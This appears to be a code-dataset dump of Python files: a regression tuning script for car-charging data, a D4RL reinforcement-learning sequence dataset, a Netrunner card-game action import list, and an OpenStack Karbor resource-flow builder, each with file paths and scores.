car_train = pd.read_csv(readFile_carfeatures[i], dtype={'charge_start_time': str, 'charge_end_time': str})
car_train_list.append(car_train)
# test features
for i in range(len(readFile_carfeatures)):
car_test = pd.read_csv(readFile_testfeatures[i])
car_test_list.append(car_test)
car_index = 0 # 0 = car1
car_train = pd.read_csv(readFile_carfeatures[car_index], dtype={'charge_start_time': str, 'charge_end_time': str})
# 区分快慢充电
# car_train = car_train[car_train['charge_mode'].isin([0])]
# 区分电池阶段
# car_train = car_train[car_train['phase'].isin([0])]
norm_X_train, norm_y_train, norm_test, y_scal = select_drop_standand(car_train, car_test, num=car_index+1)
train_target = np.ravel(np.array(norm_y_train))
# plot_learning_curve
r_alphas_best = {'alpha': 0.0008}
title = "Learning Curves Ridge"
plot_learning_curve(linear_model.Ridge(**r_alphas_best), title, norm_X_train, train_target, cv=5)
l_alphas_best = {'alpha': 0.00001}
title = "Learning Curves Lasso"
plot_learning_curve(linear_model.Lasso(**l_alphas_best), title, norm_X_train, train_target, cv=5)
ElasticNet_pram = {'alpha': 0.0001, 'l1_ratio': 5}
title = "Learning Curves ElasticNet"
plot_learning_curve(linear_model.ElasticNet(**ElasticNet_pram), title, norm_X_train, train_target, cv=5)
gbm_param = {'n_estimators': 2000, 'max_depth': 4, 'min_samples_split': 2, 'min_samples_leaf': 2,
'max_features': 'auto', 'subsample': 0.6, 'learning_rate': 0.008}
title = "Learning Curves gbm"
plot_learning_curve(GradientBoostingRegressor(**gbm_param), title, norm_X_train, train_target, cv=5)
xgb_param = {'max_depth': 3, 'min_child_weight': 0.9, 'gamma': 0.0001, 'subsample': 0.55,
'scale_pos_weight': 1, 'learning_rate': 0.008, 'reg_alpha': 0.001,
'colsample_bytree': 0.9, 'booster': 'gbtree', 'n_estimators': 3000}
title = "Learning Curves xgb"
plot_learning_curve(xgb.XGBRegressor(**xgb_param), title, norm_X_train, train_target, cv=5)
svr_pram = {'C': 250, 'gamma': 0.001}
title = "Learning Curves SVR"
plot_learning_curve(svm.SVR(**svr_pram), title, norm_X_train, train_target, cv=5)
#### Ridge 选取最佳参数
r_alphas = [0,0.00001,0.0001,0.0008,0.001,0.005,0.1,0.4,1,10,15,20,30,40,50]
r_alphas = [0,0.00001,0.0001,0.0008,0.001,0.005,0.1,0.4,1]
ridge_scores = []
for alpha in r_alphas:
score = ridge_selector(alpha, norm_X_train, train_target)
ridge_scores.append(score)
ridge_score_table = pd.DataFrame(ridge_scores, r_alphas, columns=['Ridge_RMSE'])
print(ridge_score_table)
# 用最佳参数进行计算
r_alphas_best = [0.0008]
ridge = make_pipeline(RidgeCV(alphas = r_alphas_best, cv = kfolds))
ridge_model_score = cv_rmse(ridge, norm_X_train, train_target)
plt.plot(r_alphas, ridge_scores, label='Ridge')
plt.legend('center')
plt.xlabel('alpha')
plt.ylabel('score')
print("ridge cv score: {0:.6f}".format(ridge_model_score.mean()))
#### Lasso 选取最佳参数
l_alphas = [0.00001,0.0001,0.001,0.003,0.008,0.01,0.05,0.1,0.2]
lasso_scores = []
for alpha in l_alphas:
score = lasso_selector(alpha, norm_X_train, train_target)
lasso_scores.append(score)
lasso_score_table = pd.DataFrame(lasso_scores, l_alphas, columns=['Lasso_RMSE'])
print(lasso_score_table)
# 用最佳参数进行计算
l_alphas_best = [0.001]
lasso = make_pipeline(LassoCV(max_iter=1e7, alphas = l_alphas_best, cv = kfolds))
lasso_model_score = cv_rmse(lasso, norm_X_train, train_target)
print("Lasso cv score: {0:.6f}".format(lasso_model_score.mean()))
lasso_model2 = make_pipeline(RobustScaler(),
LassoCV(max_iter=1e7,
alphas = l_alphas,
random_state = 42)).fit(norm_X_train, train_target)
scores = lasso_model2.steps[1][1].mse_path_
plt.figure()
plt.xlabel('alpha')
plt.ylabel('RMSE')
plt.tight_layout()
plt.show()
#### 分析lasso k-fold 过拟合 特征
alphas_mse = [0.00001,0.0001,0.006,0.001,0.003,0.008,0.01,0.05,0.1,0.2,0.3,0.4,0.5]
lasso_model_mse = make_pipeline(RobustScaler(), LassoCV(max_iter=1e7, alphas = alphas_mse, cv = kfolds
)).fit(norm_X_train, train_target)
lasso_model_score = cv_rmse(lasso_model_mse, norm_X_train, train_target)
print("Lasso cv score: {0:.6f}".format(lasso_model_score.mean()))
lcv_scores = lasso_model_mse.steps[1][1].mse_path_
plt.plot(alphas_mse, lcv_scores, label='Lasso')
coeffs = pd.DataFrame(list(zip(norm_X_train.columns, lasso_model_mse.steps[1][1].coef_)), columns=['Features', 'Coefficients'])
used_coeffs = coeffs[coeffs['Coefficients'] != 0].sort_values(by='Coefficients', ascending=False)
print(used_coeffs.shape)
print(used_coeffs)
used_coeffs_values = norm_X_train[used_coeffs['Features']]
used_coeffs_values.shape
overfit_test2 = []
for i in used_coeffs_values.columns:
counts2 = used_coeffs_values[i].value_counts()
zeros2 = counts2.iloc[0]
if zeros2 / len(used_coeffs_values) * 100 > 40:
overfit_test2.append(i)
print('Overfit Features')
print(overfit_test2)
#### elastic_model
e_alphas_best = [0.0008,0.0001,0.0002,0.001,0.01,0.1,1,10,100]
e_l1ratio_best = [0.001,0.01,0.1,1,5,10,100]
elastic = make_pipeline(RobustScaler(),
ElasticNetCV(max_iter=1e5, alphas=e_alphas_best,
cv=kfolds, l1_ratio=e_l1ratio_best))
elastic_model = elastic.fit(norm_X_train, train_target)
elastic_model_score = cv_rmse(elastic_model, norm_X_train, train_target)
print("elastic cv score: {0:.6f}".format(elastic_model_score.mean()))
print(elastic_model.steps[1][1].alpha_)
print(elastic_model.steps[1][1].l1_ratio_)
#### xgb 选取最佳参数
xgb_reg = xgb.XGBRegressor()
xgb_reg_param_grid = {'max_depth': [3,4,6], 'min_child_weight': [0.9,1], 'gamma': [0.0001],'colsample_bytree': [0.9,0.8],
'subsample': [0.7,0.55], 'scale_pos_weight': [1], 'learning_rate': [0.01], 'reg_alpha': [0.001],
'booster': ['gbtree'], 'n_estimators': [3000]}
xgb_reg_param_grid = {'max_depth': [4], 'min_child_weight': [1], 'gamma': [0.0001],'colsample_bytree': [0.9],
'subsample': [0.55], 'scale_pos_weight': [1], 'learning_rate': [0.01], 'reg_alpha': [0.001],
'booster': ['gbtree'], 'n_estimators': [3000]}
xgb_reg_grid = model_selection.GridSearchCV(xgb_reg, xgb_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
xgb_reg_grid.fit(norm_X_train, train_target)
print('Best XGB Params:' + str(xgb_reg_grid.best_params_))
print('Best XGB score:' + str(np.sqrt(-xgb_reg_grid.best_score_)))
feature_imp_sorted_xgb = pd.DataFrame({'feature': list(norm_X_train),
'importance': xgb_reg_grid.best_estimator_.feature_importances_}).sort_values(
'importance', ascending=False)
features_top_n_xgb = feature_imp_sorted_xgb.head(10)['feature']
xgb_feature_importance = 100.0 * (feature_imp_sorted_xgb['importance'] / feature_imp_sorted_xgb['importance'].max())
xgb_important_idx = np.where(xgb_feature_importance)[0]
posxgb = np.arange(xgb_important_idx.shape[0]) + .5
plt.barh(posxgb, np.array(xgb_feature_importance[xgb_feature_importance != 0]))
plt.yticks(posxgb, feature_imp_sorted_xgb['feature'])
plt.xlabel('Relative Importance')
plt.title('XGB Features Importance')
plt.show()
#### gbm 选取最佳参数
gbm_reg = GradientBoostingRegressor(random_state=1)
gbm_reg_param_grid = {'n_estimators': [2000,3000], 'max_depth': [3,4], 'min_samples_split': [2,10,15], 'min_samples_leaf': [2,5],
'max_features': ['auto'], 'subsample': [0.6,0.7], 'learning_rate': [0.01]}
gbm_reg_param_grid = {'n_estimators': [2000], 'max_depth': [4], 'min_samples_split': [2], 'min_samples_leaf': [2],
'max_features': ['auto'], 'subsample': [0.6], 'learning_rate': [0.01]}
gbm_reg_grid = model_selection.GridSearchCV(gbm_reg, gbm_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
gbm_reg_grid.fit(norm_X_train, train_target)
print('Best gbm Params:' + str(gbm_reg_grid.best_params_))
print('Best gbm score:' + str(np.sqrt(-gbm_reg_grid.best_score_)))
feature_imp_sorted_gbm = pd.DataFrame({'feature': list(norm_X_train),
'importance': gbm_reg_grid.best_estimator_.feature_importances_}).sort_values(
'importance', ascending=False)
features_top_n_gbm = feature_imp_sorted_gbm.head(10)['feature']
gbm_feature_importance = 100.0 * (feature_imp_sorted_gbm['importance'] / feature_imp_sorted_gbm['importance'].max())
gbm_important_idx = np.where(gbm_feature_importance)[0]
posgbm = np.arange(gbm_important_idx.shape[0]) + .5
plt.figure()
plt.barh(posgbm, np.array(gbm_feature_importance[gbm_feature_importance != 0]))
plt.yticks(posgbm, feature_imp_sorted_gbm['feature'])
plt.xlabel('Relative Importance')
plt.title('GradientBoosting Feature Importance')
#### lgm 选取最佳参数
# lgm_reg = LGBMRegressor()
# lgm_reg_param_grid = {'learning_rate':[0.01], 'n_estimators':[2000],
# 'max_depth':[3], 'num_leaves':[4],
# 'max_bin':[55],
# 'feature_fraction': [0.8],'bagging_fraction':[0.9],
# 'min_data_in_leaf':[6],'min_sum_hessian_in_leaf':[0.7]}
# lgm_reg_grid = model_selection.GridSearchCV(lgm_reg, lgm_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
# scoring='neg_mean_squared_error')
# lgm_reg_grid.fit(norm_X_train, train_target)
# print('Best lgm Params:' + str(lgm_reg_grid.best_params_))
# print('Best lgm score:' + str(np.sqrt(-lgm_reg_grid.best_score_)))
# feature_imp_sorted_lgm = pd.DataFrame({'feature': list(norm_X_train),
# 'importance': lgm_reg_grid.best_estimator_.feature_importances_}).sort_values(
# 'importance', ascending=False)
# features_top_n_lgm = feature_imp_sorted_lgm.head(10)['feature']
# lgm_feature_importance = 100.0 * (feature_imp_sorted_lgm['importance'] / feature_imp_sorted_lgm['importance'].max())
# lgm_important_idx = np.where(lgm_feature_importance)[0]
# poslgm = np.arange(lgm_important_idx.shape[0]) + .5
# plt.barh(poslgm, np.array(lgm_feature_importance[lgm_feature_importance != 0]))
# plt.yticks(poslgm, feature_imp_sorted_lgm['feature'])
# plt.xlabel('Relative Importance')
# plt.title('Lgbm Feature Importance')
#### svr model
svr_reg = svm.SVR()
svr_reg_param_grid = {'C':[0.1,1,10,20,40,60,70,100,200,250,300,350,400,500,1000,2000,3000,4000],
'gamma':[0.00001,0.0001,0.0003,0.0005,0.001,0.005,0.01,0.1,1,10,100,1000]}
svr_reg_grid = model_selection.GridSearchCV(svr_reg, svr_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
svr_reg_grid.fit(norm_X_train, train_target)
print('Best svr Params:' + str(svr_reg_grid.best_params_))
print('Best svr score:' + str(np.sqrt(-svr_reg_grid.best_score_))) | 0.463201 | 0.479138 |
import collections
from typing import Callable, Optional, Tuple
import d4rl
import gym
import numpy as np
from rjax.datasets.d4rl.utils import (get_preprocessing_fn,
sequence_dataset_iter)
from rjax.datasets.dataset import Dataset
Batch = collections.namedtuple(
'Batch',
[
'observations', # [ batch_size x (seq_len + 1) x obs_dim ]
'actions', # [ batch_size x seq_len x act_dim ]
'rewards', # [ batch_size x seq_len ]
'terminals', # [ batch_size x seq_len ]
'pad_masks', # [ batch_size x (seq_len + 1) ]
])
class D4RLSequenceDataset(Dataset):
def __init__(
self,
env_name: str,
env: gym.Env,
seq_len: int = 15,
front_pad: int = 0,
back_pad: int = 0,
):
self.env = env
self.seq_len = seq_len
self.front_pad = front_pad
self.back_pad = back_pad
dataset = self.env.get_dataset()
dataset = get_preprocessing_fn(env_name)(dataset)
dataset_iter = sequence_dataset_iter(self.env, dataset)
self.path_lengths = []
self.observations_segmented = []
self.actions_segmented = []
self.rewards_segmented = []
self.terminals_segmented = []
self.pad_masks_segmented = []
for data in dataset_iter:
assert data["steps"] == data["rewards"].shape[0]
assert data["steps"] + 1 == data["observations"].shape[0]
self.path_lengths.append(data["steps"])
self.observations_segmented.append(data["observations"].astype(
np.float32))
self.actions_segmented.append(data["actions"].astype(np.float32))
self.rewards_segmented.append(data["rewards"].astype(np.float32))
self.terminals_segmented.append(data["terminals"].astype(
np.float32))
self.pad_masks_segmented.append(
np.ones(data["observations"].shape[0], dtype=np.float32))
self.n_trajectories = len(self.path_lengths)
# padding
for i in range(self.n_trajectories):
self.path_lengths[
i] = self.front_pad + self.path_lengths[i] + self.back_pad
self.observations_segmented[i] = np.pad(
self.observations_segmented[i],
((self.front_pad, self.back_pad), (0, 0)),
constant_values=0.0)
self.actions_segmented[i] = np.pad(
self.actions_segmented[i],
((self.front_pad, self.back_pad), (0, 0)),
constant_values=0.0)
self.rewards_segmented[i] = np.pad(
self.rewards_segmented[i], ((self.front_pad, self.back_pad), ),
constant_values=0.0)
self.terminals_segmented[i] = np.pad(
self.terminals_segmented[i],
((self.front_pad, self.back_pad), ),
constant_values=0.0)
self.pad_masks_segmented[i] = np.pad(
self.pad_masks_segmented[i],
((self.front_pad, self.back_pad), ),
constant_values=0.0)
# generate dataset indices
indices = []
for path_ind, length in enumerate(self.path_lengths):
end = length - self.seq_len + 1
for i in range(end):
indices.append((path_ind, i, i + self.seq_len))
self.indices = np.array(indices)
self._size = len(self.indices)
@property
def size(self) -> int:
return self._size
def __getitem__(
self, idx: int
) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
path_ind, start_ind, end_ind = self.indices[idx]
# [ (seq_len + 1) x obs_dim ]
observations = self.observations_segmented[path_ind][
start_ind:end_ind + 1]
# [ seq_len x act_dim ]
actions = self.actions_segmented[path_ind][start_ind:end_ind]
# [ seq_len ]
rewards = self.rewards_segmented[path_ind][start_ind:end_ind]
# [ seq_len ]
terminals = self.terminals_segmented[path_ind][start_ind:end_ind]
# [ (seq_len + 1) ]
pad_masks = self.pad_masks_segmented[path_ind][start_ind:end_ind + 1]
return observations, actions, rewards, terminals, pad_masks
def get_random_batch(self, batch_size: int) -> Batch:
indices = np.random.randint(self.size, size=batch_size)
observations, actions, rewards, terminals, pad_masks = zip(
*[self[idx] for idx in indices])
return Batch(observations=np.stack(observations, axis=0),
actions=np.stack(actions, axis=0),
rewards=np.stack(rewards, axis=0),
terminals=np.stack(terminals, axis=0),
pad_masks=np.stack(pad_masks, axis=0)) | rjax/datasets/d4rl/sequence_dataset.py | import collections
from typing import Callable, Optional, Tuple
import d4rl
import gym
import numpy as np
from rjax.datasets.d4rl.utils import (get_preprocessing_fn,
sequence_dataset_iter)
from rjax.datasets.dataset import Dataset
Batch = collections.namedtuple(
'Batch',
[
'observations', # [ batch_size x (seq_len + 1) x obs_dim ]
'actions', # [ batch_size x seq_len x act_dim ]
'rewards', # [ batch_size x seq_len ]
'terminals', # [ batch_size x seq_len ]
'pad_masks', # [ batch_size x (seq_len + 1) ]
])
class D4RLSequenceDataset(Dataset):
def __init__(
self,
env_name: str,
env: gym.Env,
seq_len: int = 15,
front_pad: int = 0,
back_pad: int = 0,
):
self.env = env
self.seq_len = seq_len
self.front_pad = front_pad
self.back_pad = back_pad
dataset = self.env.get_dataset()
dataset = get_preprocessing_fn(env_name)(dataset)
dataset_iter = sequence_dataset_iter(self.env, dataset)
self.path_lengths = []
self.observations_segmented = []
self.actions_segmented = []
self.rewards_segmented = []
self.terminals_segmented = []
self.pad_masks_segmented = []
for data in dataset_iter:
assert data["steps"] == data["rewards"].shape[0]
assert data["steps"] + 1 == data["observations"].shape[0]
self.path_lengths.append(data["steps"])
self.observations_segmented.append(data["observations"].astype(
np.float32))
self.actions_segmented.append(data["actions"].astype(np.float32))
self.rewards_segmented.append(data["rewards"].astype(np.float32))
self.terminals_segmented.append(data["terminals"].astype(
np.float32))
self.pad_masks_segmented.append(
np.ones(data["observations"].shape[0], dtype=np.float32))
self.n_trajectories = len(self.path_lengths)
# padding
for i in range(self.n_trajectories):
self.path_lengths[
i] = self.front_pad + self.path_lengths[i] + self.back_pad
self.observations_segmented[i] = np.pad(
self.observations_segmented[i],
((self.front_pad, self.back_pad), (0, 0)),
constant_values=0.0)
self.actions_segmented[i] = np.pad(
self.actions_segmented[i],
((self.front_pad, self.back_pad), (0, 0)),
constant_values=0.0)
self.rewards_segmented[i] = np.pad(
self.rewards_segmented[i], ((self.front_pad, self.back_pad), ),
constant_values=0.0)
self.terminals_segmented[i] = np.pad(
self.terminals_segmented[i],
((self.front_pad, self.back_pad), ),
constant_values=0.0)
self.pad_masks_segmented[i] = np.pad(
self.pad_masks_segmented[i],
((self.front_pad, self.back_pad), ),
constant_values=0.0)
# generate dataset indices
indices = []
for path_ind, length in enumerate(self.path_lengths):
end = length - self.seq_len + 1
for i in range(end):
indices.append((path_ind, i, i + self.seq_len))
self.indices = np.array(indices)
self._size = len(self.indices)
@property
def size(self) -> int:
return self._size
def __getitem__(
self, idx: int
) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
path_ind, start_ind, end_ind = self.indices[idx]
# [ (seq_len + 1) x obs_dim ]
observations = self.observations_segmented[path_ind][
start_ind:end_ind + 1]
# [ seq_len x act_dim ]
actions = self.actions_segmented[path_ind][start_ind:end_ind]
# [ seq_len ]
rewards = self.rewards_segmented[path_ind][start_ind:end_ind]
# [ seq_len ]
terminals = self.terminals_segmented[path_ind][start_ind:end_ind]
# [ (seq_len + 1) ]
pad_masks = self.pad_masks_segmented[path_ind][start_ind:end_ind + 1]
return observations, actions, rewards, terminals, pad_masks
def get_random_batch(self, batch_size: int) -> Batch:
indices = np.random.randint(self.size, size=batch_size)
observations, actions, rewards, terminals, pad_masks = zip(
*[self[idx] for idx in indices])
return Batch(observations=np.stack(observations, axis=0),
actions=np.stack(actions, axis=0),
rewards=np.stack(rewards, axis=0),
terminals=np.stack(terminals, axis=0),
pad_masks=np.stack(pad_masks, axis=0)) | 0.832679 | 0.50653 |
from csrv.model.actions import subroutines
from csrv.model.actions.access_card import AccessCard
from csrv.model.actions.action import Action
from csrv.model.actions.advance_card import AdvanceCard
from csrv.model.actions.ai_break_subroutine import AiBreakSubroutine
from csrv.model.actions.boost_breaker_strength import BoostBreakerStrength
from csrv.model.actions.break_barrier_subroutine import BreakBarrierSubroutine
from csrv.model.actions.break_code_gate_subroutine import BreakCodeGateSubroutine
from csrv.model.actions.break_sentry_subroutine import BreakSentrySubroutine
from csrv.model.actions.break_subroutine import BreakSubroutine
from csrv.model.actions.card_click_ability import CardClickAbility
from csrv.model.actions.continue_run import ContinueRun
from csrv.model.actions.discard import Discard
from csrv.model.actions.draw_from_rnd import DrawFromRnD
from csrv.model.actions.draw_from_stack import DrawFromStack
from csrv.model.actions.expose_card import ExposeCard
from csrv.model.actions.gain_a_credit import GainACredit
from csrv.model.actions.install_agenda_asset import InstallAgendaAsset
from csrv.model.actions.install_resource import InstallResource
from csrv.model.actions.install_upgrade import InstallUpgrade
from csrv.model.actions.install_ice import InstallIce
from csrv.model.actions.install_program import InstallProgram
from csrv.model.actions.install_hardware import InstallHardware
from csrv.model.actions.jack_out import JackOut
from csrv.model.actions.make_a_run_action import MakeARunAction
from csrv.model.actions.mulligan_action import MulliganAction
from csrv.model.actions.new_timing_phase import NewTimingPhase
from csrv.model.actions.place_advancement import PlaceAdvancement
from csrv.model.actions.play_event_action import PlayEventAction
from csrv.model.actions.play_operation_action import PlayOperationAction
from csrv.model.actions.purge_virus_counters import PurgeVirusCounters
from csrv.model.actions.reduce_ice_strength import ReduceIceStrength
from csrv.model.actions.remove_a_tag import RemoveATag
from csrv.model.actions.rez_asset_upgrade import RezAssetUpgrade
from csrv.model.actions.rez_ice import RezIce
from csrv.model.actions.score_agenda import ScoreAgenda
from csrv.model.actions.steal_agenda import StealAgenda
from csrv.model.actions.take_brain_damage import TakeBrainDamage
from csrv.model.actions.trash import Trash
from csrv.model.actions.trash_on_access import TrashOnAccess
from csrv.model.actions.trash_resource import TrashResource | csrv/model/actions/__init__.py | from csrv.model.actions import subroutines
from csrv.model.actions.access_card import AccessCard
from csrv.model.actions.action import Action
from csrv.model.actions.advance_card import AdvanceCard
from csrv.model.actions.ai_break_subroutine import AiBreakSubroutine
from csrv.model.actions.boost_breaker_strength import BoostBreakerStrength
from csrv.model.actions.break_barrier_subroutine import BreakBarrierSubroutine
from csrv.model.actions.break_code_gate_subroutine import BreakCodeGateSubroutine
from csrv.model.actions.break_sentry_subroutine import BreakSentrySubroutine
from csrv.model.actions.break_subroutine import BreakSubroutine
from csrv.model.actions.card_click_ability import CardClickAbility
from csrv.model.actions.continue_run import ContinueRun
from csrv.model.actions.discard import Discard
from csrv.model.actions.draw_from_rnd import DrawFromRnD
from csrv.model.actions.draw_from_stack import DrawFromStack
from csrv.model.actions.expose_card import ExposeCard
from csrv.model.actions.gain_a_credit import GainACredit
from csrv.model.actions.install_agenda_asset import InstallAgendaAsset
from csrv.model.actions.install_resource import InstallResource
from csrv.model.actions.install_upgrade import InstallUpgrade
from csrv.model.actions.install_ice import InstallIce
from csrv.model.actions.install_program import InstallProgram
from csrv.model.actions.install_hardware import InstallHardware
from csrv.model.actions.jack_out import JackOut
from csrv.model.actions.make_a_run_action import MakeARunAction
from csrv.model.actions.mulligan_action import MulliganAction
from csrv.model.actions.new_timing_phase import NewTimingPhase
from csrv.model.actions.place_advancement import PlaceAdvancement
from csrv.model.actions.play_event_action import PlayEventAction
from csrv.model.actions.play_operation_action import PlayOperationAction
from csrv.model.actions.purge_virus_counters import PurgeVirusCounters
from csrv.model.actions.reduce_ice_strength import ReduceIceStrength
from csrv.model.actions.remove_a_tag import RemoveATag
from csrv.model.actions.rez_asset_upgrade import RezAssetUpgrade
from csrv.model.actions.rez_ice import RezIce
from csrv.model.actions.score_agenda import ScoreAgenda
from csrv.model.actions.steal_agenda import StealAgenda
from csrv.model.actions.take_brain_damage import TakeBrainDamage
from csrv.model.actions.trash import Trash
from csrv.model.actions.trash_on_access import TrashOnAccess
from csrv.model.actions.trash_resource import TrashResource | 0.522689 | 0.038125 |
from collections import namedtuple
from karbor.common import constants
from karbor import exception
from karbor.services.protection import graph
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
HOOKS = (
HOOK_PRE_BEGIN,
HOOK_PRE_FINISH,
HOOK_MAIN,
HOOK_COMPLETE
) = (
'on_prepare_begin',
'on_prepare_finish',
'on_main',
'on_complete'
)
ResourceHooks = namedtuple('ResourceHooks', [
HOOK_PRE_BEGIN,
HOOK_PRE_FINISH,
HOOK_MAIN,
HOOK_COMPLETE,
])
OPERATION_EXTRA_ARGS = {
constants.OPERATION_RESTORE: ['restore', 'new_resources'],
}
def noop_handle(*args, **kwargs):
pass
class ResourceFlowGraphWalkerListener(graph.GraphWalkerListener):
def __init__(self, resource_flow, operation_type, context, parameters,
plugins, workflow_engine):
super(ResourceFlowGraphWalkerListener, self).__init__()
self.operation_type = operation_type
self.context = context
self.parameters = parameters or {}
self.plugins = plugins
self.workflow_engine = workflow_engine
self.flow = resource_flow
self.node_tasks = {}
self.task_stack = []
self.current_resource = None
def _create_hook_tasks(self, operation_obj, resource):
pre_begin_task = self._create_hook_task(operation_obj, resource,
HOOK_PRE_BEGIN)
pre_finish_task = self._create_hook_task(operation_obj, resource,
HOOK_PRE_FINISH)
main_task = self._create_hook_task(operation_obj, resource,
HOOK_MAIN)
post_task = self._create_hook_task(operation_obj, resource,
HOOK_COMPLETE)
return ResourceHooks(pre_begin_task, pre_finish_task, main_task,
post_task)
def _create_hook_task(self, operation_obj, resource, hook_type):
method = getattr(operation_obj, hook_type, noop_handle)
assert callable(method), (
'Resource {} method "{}" is not callable'
).format(resource.type, hook_type)
task_name = "{operation_type}_{hook_type}_{type}_{id}".format(
type=resource.type,
id=resource.id,
hook_type=hook_type,
operation_type=self.operation_type,
)
parameters = {}
parameters.update(self.parameters.get(resource.type, {}))
resource_id = '{}#{}'.format(resource.type, resource.id)
parameters.update(self.parameters.get(resource_id, {}))
injects = {
'context': self.context,
'parameters': parameters,
'resource': resource,
}
requires = OPERATION_EXTRA_ARGS.get(self.operation_type, [])
requires.append('operation_log')
task = self.workflow_engine.create_task(method,
name=task_name,
inject=injects,
requires=requires)
return task
def on_node_enter(self, node, already_visited):
resource = node.value
LOG.debug(
"Enter node (type: %(type)s id: %(id)s visited: %(visited)s)",
{"type": resource.type, "id": resource.id, "visited":
already_visited}
)
self.current_resource = resource
if already_visited:
self.task_stack.append(self.node_tasks[resource.id])
return
if resource.type not in self.plugins:
raise exception.ProtectionPluginNotFound(type=resource.type)
protection_plugin = self.plugins[resource.type]
operation_getter_name = 'get_{}_operation'.format(self.operation_type)
operation_getter = getattr(protection_plugin, operation_getter_name)
assert callable(operation_getter)
operation_obj = operation_getter(resource)
hooks = self._create_hook_tasks(operation_obj, resource)
LOG.debug("added operation %s hooks", self.operation_type)
self.node_tasks[resource.id] = hooks
self.task_stack.append(hooks)
self.workflow_engine.add_tasks(self.flow, hooks.on_prepare_begin,
hooks.on_prepare_finish, hooks.on_main,
hooks.on_complete)
self.workflow_engine.link_task(self.flow, hooks.on_prepare_begin,
hooks.on_prepare_finish)
self.workflow_engine.link_task(self.flow, hooks.on_prepare_finish,
hooks.on_main)
self.workflow_engine.link_task(self.flow, hooks.on_main,
hooks.on_complete)
def on_node_exit(self, node):
resource = node.value
LOG.debug(
"Exit node (type: %(type)s id: %(id)s)",
{"type": resource.type, "id": resource.id}
)
child_hooks = self.task_stack.pop()
if len(self.task_stack) > 0:
parent_hooks = self.task_stack[-1]
self.workflow_engine.link_task(self.flow,
parent_hooks.on_prepare_begin,
child_hooks.on_prepare_begin)
self.workflow_engine.link_task(self.flow,
child_hooks.on_prepare_finish,
parent_hooks.on_prepare_finish)
self.workflow_engine.link_task(self.flow, child_hooks.on_complete,
parent_hooks.on_complete)
def build_resource_flow(operation_type, context, workflow_engine,
plugins, resource_graph, parameters):
LOG.info("Build resource flow for operation %s", operation_type)
resource_graph_flow = workflow_engine.build_flow(
'ResourceGraphFlow_{}'.format(operation_type),
'graph',
)
resource_walker = ResourceFlowGraphWalkerListener(resource_graph_flow,
operation_type,
context,
parameters,
plugins,
workflow_engine)
walker = graph.GraphWalker()
walker.register_listener(resource_walker)
LOG.debug("Starting resource graph walk (operation %s)", operation_type)
walker.walk_graph(resource_graph)
LOG.debug("Finished resource graph walk (operation %s)", operation_type)
return resource_graph_flow | karbor/services/protection/resource_flow.py | from collections import namedtuple
from karbor.common import constants
from karbor import exception
from karbor.services.protection import graph
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
HOOKS = (
HOOK_PRE_BEGIN,
HOOK_PRE_FINISH,
HOOK_MAIN,
HOOK_COMPLETE
) = (
'on_prepare_begin',
'on_prepare_finish',
'on_main',
'on_complete'
)
ResourceHooks = namedtuple('ResourceHooks', [
HOOK_PRE_BEGIN,
HOOK_PRE_FINISH,
HOOK_MAIN,
HOOK_COMPLETE,
])
OPERATION_EXTRA_ARGS = {
constants.OPERATION_RESTORE: ['restore', 'new_resources'],
}
def noop_handle(*args, **kwargs):
pass
class ResourceFlowGraphWalkerListener(graph.GraphWalkerListener):
def __init__(self, resource_flow, operation_type, context, parameters,
plugins, workflow_engine):
super(ResourceFlowGraphWalkerListener, self).__init__()
self.operation_type = operation_type
self.context = context
self.parameters = parameters or {}
self.plugins = plugins
self.workflow_engine = workflow_engine
self.flow = resource_flow
self.node_tasks = {}
self.task_stack = []
self.current_resource = None
def _create_hook_tasks(self, operation_obj, resource):
pre_begin_task = self._create_hook_task(operation_obj, resource,
HOOK_PRE_BEGIN)
pre_finish_task = self._create_hook_task(operation_obj, resource,
HOOK_PRE_FINISH)
main_task = self._create_hook_task(operation_obj, resource,
HOOK_MAIN)
post_task = self._create_hook_task(operation_obj, resource,
HOOK_COMPLETE)
return ResourceHooks(pre_begin_task, pre_finish_task, main_task,
post_task)
def _create_hook_task(self, operation_obj, resource, hook_type):
method = getattr(operation_obj, hook_type, noop_handle)
assert callable(method), (
'Resource {} method "{}" is not callable'
).format(resource.type, hook_type)
task_name = "{operation_type}_{hook_type}_{type}_{id}".format(
type=resource.type,
id=resource.id,
hook_type=hook_type,
operation_type=self.operation_type,
)
parameters = {}
parameters.update(self.parameters.get(resource.type, {}))
resource_id = '{}#{}'.format(resource.type, resource.id)
parameters.update(self.parameters.get(resource_id, {}))
injects = {
'context': self.context,
'parameters': parameters,
'resource': resource,
}
requires = OPERATION_EXTRA_ARGS.get(self.operation_type, [])
requires.append('operation_log')
task = self.workflow_engine.create_task(method,
name=task_name,
inject=injects,
requires=requires)
return task
def on_node_enter(self, node, already_visited):
resource = node.value
LOG.debug(
"Enter node (type: %(type)s id: %(id)s visited: %(visited)s)",
{"type": resource.type, "id": resource.id, "visited":
already_visited}
)
self.current_resource = resource
if already_visited:
self.task_stack.append(self.node_tasks[resource.id])
return
if resource.type not in self.plugins:
raise exception.ProtectionPluginNotFound(type=resource.type)
protection_plugin = self.plugins[resource.type]
operation_getter_name = 'get_{}_operation'.format(self.operation_type)
operation_getter = getattr(protection_plugin, operation_getter_name)
assert callable(operation_getter)
operation_obj = operation_getter(resource)
hooks = self._create_hook_tasks(operation_obj, resource)
LOG.debug("added operation %s hooks", self.operation_type)
self.node_tasks[resource.id] = hooks
self.task_stack.append(hooks)
self.workflow_engine.add_tasks(self.flow, hooks.on_prepare_begin,
hooks.on_prepare_finish, hooks.on_main,
hooks.on_complete)
self.workflow_engine.link_task(self.flow, hooks.on_prepare_begin,
hooks.on_prepare_finish)
self.workflow_engine.link_task(self.flow, hooks.on_prepare_finish,
hooks.on_main)
self.workflow_engine.link_task(self.flow, hooks.on_main,
hooks.on_complete)
def on_node_exit(self, node):
resource = node.value
LOG.debug(
"Exit node (type: %(type)s id: %(id)s)",
{"type": resource.type, "id": resource.id}
)
child_hooks = self.task_stack.pop()
if len(self.task_stack) > 0:
